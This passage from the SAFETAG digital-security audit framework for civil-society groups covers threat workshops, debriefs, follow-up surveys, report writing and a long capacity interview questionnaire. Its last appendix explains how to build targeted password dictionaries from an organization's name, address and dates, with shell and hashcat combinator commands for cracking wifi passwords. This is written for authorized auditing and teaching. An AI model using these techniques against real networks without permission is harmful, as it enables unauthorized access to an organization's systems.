Impact Ranking: The goal of this exercise is to have the trainee lead the host organization in classifying the severity of the possible impacts from the threats they have just explored.

Recommendation

Creating a Risk Matrix

Summary
Overview
Materials Needed
Considerations
Walkthrough

After the activities are complete the auditor has tasks that build upon the outputs of the activities. These can be completed offsite.

Risk vs Difficulty
Risk vs Difficulty
Risk vs Likelihood
Risk vs Likelihood
Impact vs Severity
Impact vs Severity
Recommendation

Threat Interaction

Summary

This helps the auditor enumerate threats that the organization is concerned about and the internal priorities of them. At the same time, it enables a discussion of how threats can interrelate and helps define the difference between a threat and a risk (a threat that has a vulnerability associated with it), and the value of mitigation.

This exercise works well with larger groups, and can be woven in to the Threat Identification activity.

Overview
Materials Needed
Considerations
Walkthrough

Also review the Threat Identification exercises to tailor these to best meet your information gathering needs based on your interactions with the organization.

Threat Brainstorming (15 minutes)

Split participants into small groups. This grouping is particularly valuable for larger organizations, but even for small ones, having multiple separate groups helps reveal shared concerns around the threats the staff face. For a group that is too small to group, have each staff member brainstorm by themselves.

Have each group or staff member quickly write down any possible "threat" they or the organization face. Some examples ("kidnapping," "website hacked") can help seed this activity.

If you have multiple colors of stickies, having them categorize threats by "physical," "digital," or "other/both" will be useful to show their inter-relation.

Keep reminding participants of the time remaining to keep them brainstorming rather than discussing threat details or arguing over whether a threat is physical or digital.

Threat Clustering and Discussion

After the brainstorming, gather and cluster the stickies on a wall, revealing duplicate concerns across the groups and thematic areas of concern.

As clusters become clear, ask if any events similar to this threat have already happened to the organization? What was the impact? Has it happened more than once? Regularly? Mark these threats.

Note: Some of these threats may be traumatic experiences, consider skipping public discussion of historical occurrence if many of the threats from the brainstorm (or from one person/group in particular) are particularly intense.

Threat Bow-tie

Select one of the threats that emerged as a concern from the clustering to place at the center of a "bow-tie" like drawing on a whiteboard or flip-chart paper.

Begin asking what other threats identified could come as a result of this threat, supplanting the responses from the participants with additional threats. For example, a hacked website could lead to loss of trust by funders or partners. "Chain reactions" can be illustrated as lines of events (loss of trust by funders could lead to a loss of funding). Do the same for what threats could lead to the "central" threat - a confiscation of a device could lead to email hacking, for example. Some threats can be both potential causes and secondary effects.

Close out this with a discussion of how every threat is potentially connected to both digital and physical impacts.

Recommendation

Regional Context Research

Covered in full in Capacity Assessment:

Responsive Support

Summary

The auditor provides assistance for any immediate action needed (spot training, tool fixes, consulting on upcoming projects) -- this may also involve addressing vulnerabilities that triggered an incident response.

Purpose

In-audit activities and training are used to increase an organization's agency to seek out and address immediate security challenges within their organization, as well as enabling the organization to securely receive and store the audit report.

The Flow of Information

Responsive Support Information Flow
Responsive Support Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Facilitation Preparation

Digital Security Trainings

Digital Security Guides

Training Resources

Activities

Due to the wide variety of needs found during SAFETAG audits, the framework relies on the wealth of existing training curricula and digital security guides, listed below.

Of specific use are the following training guides from Level-Up. Review the Level-Up Curricula Guide prior to using these activities:

Debrief

Summary

This component consists of an out-brief to key points of contact, providing basic pressure relief through group and individual interactions, and planning future follow-up with the host and key individuals.

Purpose

SAFETAG is an auditing framework designed to connect small civil society organizations and independent media outlets to the digital security services they need. But, more than that it is designed to provide audits that increase an organization's agency to seek out and address security challenges independently. This can be an auditor's last in-person chance to engage with the staff to shape their perspective of the audit.

The debrief allows the auditor to ensure that they leave the host and its staff ready to start addressing their digital security. By providing some immediate outcomes to the host and its staff, and in combination with training or security consultation in the Responsive Support section, the auditor can ensure that the host sees the audit as a guide instead of a condemnation.

The Flow of Information

Debrief Information Flow
Debrief Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Facilitation Preparation

Activities

Follow Up

Summary

This component allows an auditor to explain and get feedback on their report as well as evaluate the success of the process over time through a continued relationship with the host.

This component consists of the final meeting with the host and following up with them after a period of a few months to see if they need further assistance, are willing to share their experience working with any of the recommended resources, or as new resources are identified.

Purpose

Follow up can be a valuable tool for encouraging an organization to continue their digital security process. But, follow up needs to be desired by an organization and achievable for the auditor. As such, follow up must be minimally intrusive on both the auditor and the host's time.

The Flow of Information

Information Flow
Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Resource Lists

Possible Financial Resources for Host Organizations

International organisations that may provide security grants

Frontline Defenders Security Grants Programme _See also the "Alternative Sources of Funding" list on this page

Digital Defenders Digital Security Emergency and Support Grants

Freedom House Emergency Assistance Programs

Digital Security Trainings

Emergency Resources

Emergency Aid for Journalists

International protection mechanisms for human rights defenders

What Protection Can The United Nations Field Presences Provide?

24/7 Digital Security Helpline: [email protected] PGP key fingerprint: 6CE6 221C 98EC F399 A04C 41B8 C46B ED33 32E8 A2BC

Rapid Response Network: [email protected] PGP key: 7218 4AA7 4ED2 05ED 9863 A2A7 1F84 9150 6BFC 20AC

Organizations providing rapid-response digital security support and funding

Activities

Follow-up Meeting

Summary

Schedule and have a follow up call to discuss the audit report. This provides a valuable touch-point for the organization to read the report and ask any clarifying questions to the auditor, as well as for the auditor to underscore any important steps for the organization.

Overview
Materials Needed
Considerations
Walkthrough

Each organization, and often even each key point of contact within the organization, will want to explore the report in different ways. Adapt to the needs of the organization, but make sure you cover the top-priority recommendations that the organization needs to consider in the immediate future.

Ask the organization to fill out Staff Feedback Surveys.

Ask if they need any specific resources or introductions not included in the report.

At the end of the call, schedule a second follow-up call to check in on their progress.

Recommendation

Making Introductions

Summary

Make introduction between host and known resources as needed.

Overview
Materials Needed
Considerations
Walkthrough

Based on the specific recommendations in the audit report, as well as the auditor's understanding of the organization's capacity and barriers faced, introduce the relevant points of contact at the organization to resources such as digital security trainers, funding organizations which provide targeted support for digital security, technical experts to help on specific tasks (e.g. server hardening, website migration), as well as services that could help address their needs (e.g. secure hosting providers, rapid response support).

Follow up with both the organization and the resources introduced to check in on process and revise which introductions you make going forward.

Recommendation

Long-Term Follow-up

Summary

Follow up with host after a few months to check on progress, get long-term feedback and connect with any new resources.

Overview
Materials Needed
Considerations
Walkthrough

This can be combined with the Staff Feedback Survey exercise, or to follow up on any concerns you have based on their responses to that survey. The main goal of the long-term follow-up is to ensure that the organization has ongoing connection points to any resources or connections they need to remove barriers to adoption.

Recommendation

Staff Feedback Survey

Summary

Providing a space for anonymous, guided feedback is valuable to gather information about how your audit work and the SAFETAG framework itself are supporting organizational understanding of risk and their ability to adapt. This long-term capacity building is critical to the SAFETAG framework, so finding ways to measure the impact of an audit towards these goals is important.

Overview
Materials Needed
Considerations
Walkthrough

This exercise provides a simple survey you can implement in a variety of settings (Google Forms, SurveyMonkey, via plain documents, etc.).

Sample Survey Questions

  1. Before the audit:
Completely False False I don't know True Completely True
I understood the risks my organization faces [ ] [ ] [ ] [ ] [ ]
I understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
I understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks my organization faces. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]
  1. After the audit:
Completely False False I don't know True Completely True
I understood the risks my organization faces [ ] [ ] [ ] [ ] [ ]
I understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
I understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks my organization faces. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]
  1. Do you feel the audit took a reasonable amount of time?
  1. Do you have any immediate behavioral changes you intend to make because of the audit?
  1. Did the auditor provide you everything you need to start addressing your digital security?
  1. Did any training that you received specifically address the risks identified during the audit?
  1. Did the recommendations made by the auditor directly address the digital security needs you identified during the audit?
  1. Did the recommendations made by the auditor address the digital security needs of your organization?
  1. The recommendations from the audit...
  1. The biggest barrier you see to implementing the auditor's recommendations is....
Recommendation

Reporting

Recommendation Development and Resource Identification

Summary

In this component the auditor identifies the organization's strengths and weakness (expertise, finance, willingness to learn, staff time, etc.) to adopting new digital and physical security practices and documents the possible actions the organization could take on to address the vulnerabilities found during the audit, the difficulty of taking on those actions, and the resources that the host may be able to leverage to address them. Resources can include, but are not limited to, local technical support and incident response groups/trade organizations, places to obtain discount software, trainers, and guides/resrouces they can use to support their up-skilling.

Purpose

The host needs to be able to take action after an audit. The recommendations that an auditor provides to address vulnerabilities must cover a range that allows an organization to address them in both the short-term and more comprehensively in the long-term. Knowing an organization's strengths and weaknesses will allow the auditor to provide more tailored recommendations that an organization will be more likely to attempt and achieve. In doing this the SAFETAG auditor has an opportunity to act as a trusted conduit between civil society organizations in need and organizations providing digital security training, technological support, legal assistance, and incident response.

Guiding Questions

Approaches

Identify Useful Resources

Resource Identification

Summary

In this component the auditor documents resources that the host may be able to leverage to address the technical, regulatory, organizational, or behavioral vulnerabilities identified during the audit.

This can include, but is not limited to, local technical support and incident response groups/trade organizations, places to obtain discount software, trainers, and guides/resources they can use to support their up-skilling.

Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Identify and Explain Un-Addressed Concerns

Summary

Write explanations for why any adversaries or threats that the auditor identifies as "un-addressable" with the organizations current capacity.

Base Line Skills
Operational Security
Materials Needed
Materials Needed
Considerations
Output
Resources

Identify Recommendations

Summary
Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Outputs

Operational Security

Resources

Digital Security Guides

Digital Security Guides

Possible Financial Resources for Host Organizations

International organisations that may provide security grants

Frontline Defenders Security Grants Programme _See also the "Alternative Sources of Funding" list on this page

Digital Defenders Digital Security Emergency and Support Grants

Freedom House Emergency Assistance Programs

Training Resources

Emergency Resources

Emergency Aid for Journalists

International protection mechanisms for human rights defenders

What Protection Can The United Nations Field Presences Provide?

24/7 Digital Security Helpline: [email protected] PGP key fingerprint: 6CE6 221C 98EC F399 A04C 41B8 C46B ED33 32E8 A2BC

Rapid Response Network: [email protected] PGP key: 7218 4AA7 4ED2 05ED 9863 A2A7 1F84 9150 6BFC 20AC

Organizations providing rapid-response digital security support and funding

Resource Lists

Recommendation Development

Activities

Identify Useful Resources

Resource Identification

Summary

In this component the auditor documents resources that the host may be able to leverage to address the technical, regulatory, organizational, or behavioral vulnerabilities identified during the audit.

This can include, but is not limited to, local technical support and incident response groups/trade organizations, places to obtain discount software, trainers, and guides/resources they can use to support their up-skilling.

Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Identify and Explain Un-Addressed Concerns

Summary

Write explanations for why any adversaries or threats that the auditor identifies as "un-addressable" with the organizations current capacity.

Base Line Skills
Operational Security
Materials Needed
Materials Needed
Considerations
Output
Resources

Identify Recommendations

Summary
Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Roadmap Development

"Finding threats against arbitrary things is fun, but when you're building some-thing with many moving parts, you need to know where to start, and how to approach it." - Threat Modeling: Designing for Security by Adam Shostack 81

Summary

This component consists of an auditor sorting their recommendations in relation to the organizations threats and capacity. The auditor prioritizes vulnerabilities, weighs the implementation costs of recommendations and then creates an actionable roadmap for the organization to make their own informed choices about possible next steps as they move forward.

Purpose

As part of SAFETAG's dedication to building agency and supporting organizational adoption of safer practices, a careful prioritization of vulnerabilities is invaluable in keeping audit results from appearing overwhelming. An organization needs to be able to weigh their possible paths forward against the time lost from program activities, the cost to implement the threat, and the other threats that they are not addressing. Roadmapping is used to give the host the tools to make these decisions and provide them with a recommended path forward that will allow them to make immediate gains towards protecting themselves. The existing in/formal security practices captured during this process will be used to remove organizational and psyco-social barriers to starting new practices.

Baseline Skills

Preparation

Materials Needed

Approach

Outputs

Operational Security

Resources

Determining the urgency of a vulnerability

Activities

Report Creation

"A good analysis might turn the threats into stories so they stay close to mind as software is being written or reviewed. A good story contains conflict, and conflict has sides. In this case, you are on one side, and an attacker is the other side." - Threat Modeling: Designing for Security 83

Summary

This component consists of an auditor compiling their audit notes and recommendations into a comprehensive set of documents the shows the current state of security, the process by which the auditor came to that assessment, and recommendations that will guide the hosts progression to meet their security goals.

Purpose

Once an auditor has left, the report is the auditor's chance to continue a conversation (albeit a static one) -- even if the organization never talks to the auditor again. If written with care it can be a tool to encourage agency and guide adoption. The report has many audiences who will need to use it in different ways. For the auditor and the organization, it acts as documentation of what an auditor accomplished. For the organization, it will be guide for connecting vulnerabilities to actual risks, a rallying cry for change, and proof of need for funders. For those the organization brings in to support their digital security, it provides a roadmap towards that implementation and a task-list for future technologists and trainers paid to get the host there - as well as a checklist for validating that threats have been addressed.

Baseline Skills

Preparation

Materials Needed

Approach

Outputs

Operational Security

Resources

Activities

APPENDICES

APPENDIX: How to read SAFETAG

Major Sections

The Life Cycle of an Audit

This section contains explanations of the goals of the SAFETAG process and definitions of the major terminology.

Objectives

This section contains the objectives of a SAFETAG audit. These are collections of specific activities that an auditor may use to gather and confirm information about the risks an organization faces, their capacity to address them, and potential threat actors.

Reporting

This section contains the post-audit objectives used to document the organizations risks and auditors recommendations based upon a final capacity and risk assessment.

Objective Components

Summary

A short - one to four sentence - basic overview of the objective.

Purpose

The justification for why we have included this objective.

The Flow of Information

The purpose of audit activities is to acquire risk assessment and mitigation information. As this information is acquired, earlier audit steps will have to be re-visited based upon updated information. The "Flow of Information" shows the types of information that an audit objective builds upon (input), and the types of information that it may reveal (outcomes).

Guiding Questions

Each audit objective is guided by a small set of core questions. Key questions are included to help an auditor identify when they have acquired enough information and customize their approach while still collecting the correct types of information to support the organization.

Approaches

Many of these objectives can be completed in multiple ways depending upon auditor skill and the organizational technical setup and capacity. The approach section includes a list of activites that can be used to carry out parts, or the whole, of the information collection for an audit activity.

Resources

Links to resources that can be used to deepen an auditors understanding.

Activities

Summary

A short - one to four sentence - basic overview of the activity.

Base Line Skills

The baseline level of skills that the auditor must posses in order to carry out the intended activity.

Operational Security

Operational security guidelines that are specific to this activity.

Materials Needed

Any materials beyond the norm that the trainers will need.

Instructions

Where relevant, an outline of the steps an auditor will take during this activity. Not intended to replace true documentation, but useful for an auditor unable to connect to the Internet or to provide the organization's technical contact.

Considerations

Some of the activity specific concerns (ethical, skill level, time, relationship, etc.) that an auditor must take into consideration when conducting this activity.

Output

Notes on what data can be created during this activity.

Resources

Links to resources that can be used to deepen an auditors understanding of an activity.

APPENDIX: Draft Engagement and Confidentiality Agreement

In order to protect the privacy of SUBJECT, AUDITOR agrees to comply with the following restrictions:

APPENDIX: Travel Kit and Checklist

Travel Kit Checklist

Hardware
Software / digital resources
Facilitation Supplies
Logistics

APPENDIX: Sample Capacity Interview Questions

Introduction

For this interview, I will mostly ask you about how your organization relates to tech tools in a general sense. I will also ask specific questions about how your organization works with digital security issues.

Together, this information will help me identify ____________

All of the information we collect here will be kept completely private.

This interview will last approximately ____ hour.

Please feel free to stop me or ask if a question is unclear, or if you would like to take a break.

The interview starts with some questions about you and the organization. Again, this will all be kept strictly confidential.

Open Up

"Warm up the participant with questions they are comfortable with." 85

  1. What is your name?
  2. What is your position in the organization?
  3. What are your main responsibilities in this organization?
  4. When was the organization created?
  5. What issues does the organization work on? (Provide an example if needed - Examples below)
    • Human Rights
    • Transparency
    • Public Service Delivery
    • Health
    • Free Media and Information
    • Climate Issues
    • Gender Issues
    • Poverty Alleviation
    • Community Building
    • Peace promotion
    • Agricultural Development
    • Entrepreneurship
    • Water, Sanitation
    • Transportation
    • Disaster Relief
    • Other
    • No Specific Mandate
  6. Where does your organization have activities?
  7. Does the organization have activities in more than one (city/provence/country/region)
  8. What kind of funding does you organization receive?
  9. Could you tell me, approximately, which percentage of the organization’s currently annual budget is dedicated to supporting the use of digital or mobile technology?
  10. How many projects is your organization currently managing?
  11. Does the organization have its own office space?
  12. Does the organization have a domain name or brand identity that is used for all online communications?
  13. What is the organization’s working language? (for password dictionary)
  14. What other languages are used by the organization, formally or informally? (for password dictionary)
  15. In what language has your organization accessed online resources to support its work?
  16. How many paid, full-time staff does the organization employ
  17. How many paid, part-time staff does the organization employ?
  18. How many unpaid workers, such as volunteers or interns work at least one day a month at the organization?
  19. Does the organization have a staff member responsible for working with digital or mobile technology? Yes, more than one
  20. Is this staff member responsible for any of the following area
    • Office IT infrastructure
    • Internet Presence or website
    • Outreach or communications
    • Managing programs
  21. How regularly do staff members of the organization travel outside of your country
  22. Does the organization do any of the following activities when travelling internationally
    • Run programs
    • Participate in events
    • Run trainings
    • Receive trainings
    • Fundraising
Go Broad

"Prompt bigger, even aspirational, thinking that they may not be accustomed to on a daily basis." 86

Go Specific

"Dig deeper on the challenge at hand & prompt with ‘what if’ scenarios." 87

  1. What is the most important reason for your organization to exist? (Provide an example if needed - Examples below)
    • To raise awareness in the organization's policy area.
    • To impact policy.
    • To improve policy.
    • To improve service delivery.
    • To change specific legislative or administrative governance structures.
    • To provide citizens with a greater voice in public addaitrs and delberations
    • To expose corruption or malfeasance
    • No concrete strategic objectives.
  2. Does the organization provide services directly to individuals (for example health, educational or legal service?)
  3. What type of direct services does the organization provide? (Provide an example if needed - Examples below)
    • Legal Services
    • Health Services
    • Education Services
    • Water/Sanatation Services
    • Financial Services
    • Other Services
  4. Does the organization primarily rely on digital media in its work?
  5. Does your organization use....
    • Email
    • Email newsletters
    • Websites
    • Maintain blog or discussion fora, or another social media account(s)
    • Engage in online discussions and interactions on external sites
    • Maintain interactive websites
    • paid software (like microsoft office or basecamp) to manage the organization or projects
    • Free branded platforms (like google apps) to manage the organization or projects
    • digital or mobile tools to collect data or evidence
    • Digital or mobile tools to deliver health, financial, or other public services
    • Mass communication to mobile phones
    • security software (anti-virus, circumvention tools, etc)
    • disseminate information through third party sites and platforms.
    • Other
  6. What other digital tools does your organization use?
  7. What are the most important motivations for the organization to use these tools?
  8. Are there any specific outcomes for the organization’s stakeholders that you hope digital or mobile technologies can facilitate?
  9. Does the organization have specific plans to increase their capacity to use digital or mobile technologies in their work

  10. Do the organization’s staff have access to computers for their work?
  11. How many staff members do not have access to their own computer or need to share computers with other?
  12. How many people of the organization’s staff currently use digital or mobile technology on a daily basis?
  13. How many of the organization’s currently active projects would not be possible without the use of these media?
  14. Does the organization have a hierarchy for decision- making, according to which different people have different responsibility and levels of authority?
  15. Has the organization used any of the following methods to build skills and capacities for using digital or mobile technologies?
    • Local Training
    • Training in other countries
    • Online Training
    • Purchesing equiptment or hardware
    • hiring consultants
    • hiring staff or restructring human resources
    • devoting staff time to independant learning
    • participating in international events
    • searching and learning online
  16. Which other method(s) to build skills for using digital and mobile technologies?
  17. Have these efforts to increase capacity targeted specific staff members in the organization?
  18. Has the organization actively worked to strengthen its digital security in the last year?
    • (IF NO) Why did the organization not work to strengthen its digital security in the last year?
    • (IF YES) How the organization work to strengthen its digital security in the last year?
  19. Which of the below factors are the three most significant obstacles to the efficient use of digital and mobile technology by your organization?
    • Limited skills of staff
    • Limited infrastructure for media or electricity.
    • Limited technical literacy and media use among staff
    • limited financial resources
    • Insufficient hardware or software
    • None
    • Other
    • don't know
  20. What new activities using digital or mobile technologies would the organization like to attempt in the future? Please give examples of programs, activities, or management functions...
  21. Has the organization used the internet (including online training, discussions or research) to get better at any of the following activities.
    • Communicating with stakeholders and raising awareness on issues.
    • Keeping the organization and its staff safe.
    • Fundraising and developing the organization’s strategic focus.
    • Managing staff and organizational activities (such as payroll, hiring and other administration)
    • Measuring impact of programs.
  22. Why are you having the audit done?
  23. How well do you believe your organization is able to identify appropriate digital and mobile technology tools for the organization’s work?
  24. How well do you believe your organization is able to use appropriate digital and mobile technology tools for the organization’s work?
  25. Has turnaround in staff members been a problem for retaining technical capacity in your organization?
  26. In what ways, if any, have you experienced that technology inhibits the organization’s work?
  27. Are there systems on the network which the client does not own, operate, or rely on, that may require additional approval to test?
  28. Does the organization communicate with its beneficiaries/members/sources?
    • How does the organization communicate with its beneficiaries/members/sources?
  29. Does the organization use any of these tools to maintain information about its members?
    • Paper lists
    • Mobile phone contact lists
    • Email contact lists
    • Spreadsheets
    • CRM (customer relationship management software)
    • Other
  30. What other tools does the organization use to maintain information about its members?
  31. I will now read a list of hardware tools you might be familiar with. From this list, could you please tell me about the three tools that are most important to the organization?
    • Desktop computers
    • Laptop Computers
    • Mobile Phones
    • Satellite Phones
    • Video Equiptment
    • Cameras
    • USB Dongles
    • Hard Drives
    • Servers
    • Audio Recorders
    • Web Cams
    • Wireless Routers
    • Other
  32. Other hardware that is important to the organization’s work? Please describe if needed.
  33. How important you think each of these hardware tools is for achieving the organization’s strategic objectives?
  34. I will now read a list of software tools you might be familiar with. From this list, could you please tell me about the three tools that are most important in the daily work of your organization?
    • Social media
    • Blogging Platforms
    • Tools for creating and managing pictures or videos
    • Cloud Based collaboration applications
    • Budgeting Software
    • Tools for building and managing websites
    • project management software
    • Anti-virus software
    • tools for managing databases
    • Graphic design or visualization software
    • software to manage sms or mobile communication for groups
    • circumvention software
    • other
  35. Other software that is important to the organization’s work? Please describe if needed.

  36. To your knowledge, how often do the below incidents occur in the geographic areas or issue areas in which your organization is active? Could you please tell me if you think they happen never, sometimes or often
    • The government lawfully intercepts information communicated by civil society or private person
    • The government lawfully confiscates equipment because of the information it contains
    • Government, public officials, non-state actors, police or security forces use digital or mobile technology to identify and target individuals for arrest or violen
    • Government, public officials, non-state actors, police or security forces use digital or mobile technology to attack the reputations of individuals or organizations
  37. To your knowledge, how often do the below actors use digital or mobile technology to target or to identify individuals for arrest or violence? Do they use it never, sometimes, or often.
    • government or public officials
    • non-state actors (corporations, social groups)
    • police, security forces or paramilitary groups
  38. And how often would you say that these actors use digital or mobile technology to monitor or gather information on civil society activities? Never, sometimes, or often.
    • government or public officials
    • non-state actors (corporations, social groups)
    • police, security forces or paramilitary groups
  39. What do you feel are the most immediate and serious digital threats to the organization?
  40. How much risk do you feel each of these digital threats presents to your organization?
    • Online surveillance
    • DDOS (Distributed Denial of Service) Attack
    • Targeted for physical violence on the basis of digital activity
    • Data loss
    • Other.
  41. Do you feel that any of these threats place the physical security of your staff in danger?
  42. Do you feel that any of these threats place the physical security of your stakeholders in danger?
  43. Do you feel that any of these threats place the physical security of your beneficiaries in danger?
  44. In the last six months, have you or any of your civil society peers experienced any of the following?
    • Intimidation or threats of violence by public officials, police or security force
    • Intimidation or threats of violence by private or non-state actors.
    • Threats of arrest or detention
    • Arrest
    • Threats of Torture.
    • Confiscation of equipment
    • Threats to administrative standing, such as stripping individuals of professional accreditation or organization of licenses
    • Other
  45. How has your organization responded to these threats?
    • Addressed the issue in the press/online
    • Told other organizations about the threat
    • Contacted the authorities
    • Trained staff to prevent and mitigate such threats in the future
    • Requested help from other organizations
    • Invested in hardware
    • raised funds
    • has not responded
    • other
  46. Has the organization taken any of the following steps to prepare against digital or physical threats?
    • Staff have been trained
    • There are specific plans in place for specific situations
    • Equiptment and/or supplies have been made ready
    • Other
  47. Does the organization experience power outages in its office
  48. Does the organization have access to the Internet in its offices?
  49. In the last month, has your organization lost access to Internet for reasons other than power outages

Management Only
  1. Is the manager aware that a test is about to be performed?
  2. What data would create the greatest risk to the organization if exposed, corrupted, or deleted?
Technical Only
  1. Are there any systems which could be characterized as fragile? (systems with tendencies to crash, older operating systems, or which are unpatched)
  2. Are testing and validation procedures to verify that business applications are functioning properly in place?
  3. Are Disaster Recovery Procedures in place for the application data?
  4. Are Change Management procedures in place?
  5. What is the mean time to repair systems outages?
  6. Is any system monitoring software in place?
  7. What are the most critical servers and applications?
  8. Do you use backups in your organization?
    • Are there any data/devices that are not backed up?
    • Are backups tested on a regular basis?
    • When was the last time the backups were restored?
  9. How many websites does your organization have?
  10. What are their url's?
  11. Where are they hosted?
  12. How many wireless networks are in place at the organization?
  13. Is a guest wireless network used? If so:
  14. Does the guest network require authentication?
  15. What type of encryption is used on the wireless networks?
  16. Approximately how many clients will be using the wireless network?
  17. How many total IP addresses are being tested?
  18. How many internal IP addresses, if applicable?
  19. How many external IP addresses, if applicable?
  20. Are there any devices in place that may impact the results of audit scans such as a firewall, intrusion detection/prevention system, web application firewall, or load balancer?

Categories

Below are the categories each question fits within. Use this to help you reduce the information you obtained from the interview into manageable themes, insights, and implications.

Basic Information

5, 6, 8, 10, 11, 13, 14, 15, 24, 25, 7

Threat Information

58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68

Capacity

Capacity questions seek to reflect organizations’ readiness and likelihood to succeed in engaging with technology in their work. 88

23, 26, 27, 28, 34, 35, 36, 37, 38, 39, 40, 43, 45, 46, 29, 30, 31, 55, 9, 16, 17, 18, 19, 20

Challenge

Challenge questions seek to reflect the degree to which internal an external factors will complicate or inhibit the effective and safe uptake and use. 89

41, 40, 42, 46, 47, 48, 69, 70, 71

Audit Scope

Scope questions explore what the client is looking to gain out of the audit, why the client is looking to have an audit performed against their environment, and whether or not they want certain types of tests performed during the audit. 90

44, 72, 49, 51, 50, 52

Network Audit Questions

90, 91, 92, 93, 81, 80, 79, 78, 77, 49, 74, 75, 76, 53, 54, 56, 57

Web Application Audit Questions

12, 82, 83, 84

Wireless Audit Questions

85, 86, 87, 88, 89

Device Audit

32, 33, 21

Data Audit

73

APPENDIX: Password Dictionaries

Password Dictionary Creation

Summary

This component provides resources and recommendations on cracking passwords - both the creation of dictionaries and rules to modify those dictionaries, as well as some basic implementation as well. This is a dangerous (and in many cases, illegal) skill to use, and should be more of a guide to auditors on what password security myths do not work against modern password cracking software, and to use only with permission and only in very specific situations as a demonstration of the power of even a common laptop against weak passwords.

Description

Weak passwords are prevalent - even after hundreds of well-publicized global password breaches, "password" and "12345" remain the most popular passwords. This exercise supports the auditor in building an effective dictionary and using it to attack non-personal and non-disruptive parts of an organization's infrastructure. Weak wifi passwords are specifically a challenge, as wifi signals often are accessible outside of an office's physical limits, but provide full access to the private network.

This skillset, plus demonstration against non-invasive accounts, provides an opening for a discussion with staff on password security. See Level Up for further activities and exercises around passwords.

Approach

Instructions

Primarily for use in the Network Access component, building a password dictionary, understanding the ways to automatically mutate it, and running it against passwords is a useful skill to have, and to use to explain why simple passwords are insecure. This Ars Technica article provides a good insight into the path to tackle iterative password cracking using a variety of tools to meet different goals.

These instructions use a small set of password cracking tools, but many are possible. If there are tools you are more familiar or comfortable with using, these by no means are required. The only constraints are to be respectful and responsible, as well as keeping focused on the overall goals and not getting bogged down.

A good wordlist with a few tweaks tends to break most passwords. Using a collection of all English words, all words from the language of the organization being audited, plus a combination of all these words, plus relevant keywords, addresses, and years tends to crack most wifi passwords in a reasonable timeframe.

An approach which begins with quick, but often fruitful, attacks to more and more complex (and time consuming) attacks is the most rewarding. However, after an hour or two of password hacking, the in-office time on other activities is more valuable, so admit defeat and move on. See the Recommendations section for talking points around the levels of password cracking that exist in the world. You can work on passwords offline/overnight/post-audit for report completeness.

Here is a suggested path to take with suggested tools to help. You might try the first few steps in both the targeted keyword approach and the dictionary approach before moving on to the more complex mutations towards the end of each path.

Dictionary Research and Creation

Before you arrive on-site it is important to have your password cracking tools downloaded and relevant dictionaries ready to go, as your main demonstration and use of these tools is to gain access to the organization's network. The effectiveness of this demonstration is drastically reduced if you already have had to ask for the password to connect to the Internet and update your dictionaries, tools, or so on. Some of these files (especially larger password dictionaries) can be quite large, so downloading them in-country is not recommended.

Many password dictionary sites, such as SkullSecurity , maintain core dictionaries in multiple languages. If your target language is not available, some quick regular expression work can turn spell-check dictionaries (such as those used by LibreOffice into useful word lists. It is generally useful to always test with English in addition to the target language.

[CloudCracker(]https://www.cloudcracker.com/dictionaries.html) and OpenWall have, for a fee, well-tested password dictionaries.

Keyword generation

In addition, create a customized dictionary with words related to the subject as revealed in the Remote Assessment research -- including, but not limited to:

For the organization "ExampleOrg , which has its offices at 123 Central St., Federal District, Countryzstan , which does human rights and journalism work and was founded in 1992, some context-based dictionary additions would be:

exampleorg
example
org
EO
123
central
federal
district
countryzstan
human
rights
journo
journalism
1992
92

Also add common password fragments: qwerty, 1234/5/6/7/8, and, based on field experience, four-digit dates back for ~20 years in both the Gregorian (Western) and (if relevant) local calendar, plus the founding year of the organization). It's quite amazing how often a recent year will be part of a wifi password -- this presentation discusses many common patterns in passwords: https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

Optional Further steps

Use CeWL, to spider the organization's web properties to generate additional phrases. This list will need review, as some of the generated content is not very useful, but may be useful if the site is not in a language the auditor reads fluently.

For passwords other than WPA, specific policies or patterns may help to focus your password dictionary further. PACK, or Password Analysis and Cracking Toolkit is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers." PACK is most useful for large sets of passwords, where it can detect patterns in already-broken passwords to help build new rules. Both password cracking tools listed here are powerful, and have slightly different abilities. The auditor should choose the one they prefer and/or the one which has the features they desire for this job.

Combinator Attack with scripting and Hashcat

One quick way to build a more complex password list is to simply double the list up (a "combinator" attack), so that it includes an entry for each pair of these strings:

You can do a 1-way version of this list simply, such as:

 $ for foo in `cat pwdlist.txt`; do for bar in `cat pwdlist.txt`; do printf $foo$bar'\n'; done; done > pwdpairs.txt
 $ cat pwdlist.txt >> pwdpairs.txt

Hashcat can do this in a live attack under its "combinator" mode, and hashcat-utils (hiding in /usr/share/hashcat-utils/combinator.bin) provides this as a standalone tool. This provides a true combination of the list, so it exponentially increases the list size - use with caution, or use with one larger dictionary and one smaller dictionary.

For example, use these combination approach on your custom dictionary (combining it with itself, creating combinations from the above list such as example92, journorights, exampleorgrights).

$  /usr/share/hashcat-utils/combinator.bin dict.txt dict.txt

Hashcat is extremely powerful when you have desktop computer systems to use, but has a few wordlist manipulation tools that are useful regardless.

More References: (http://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 , http://www.darkmoreops.com/2014/08/18/cracking-wpa2-wpa-with-hashcat-kali-linux/ )

Word mutation with John the Ripper (JtR)

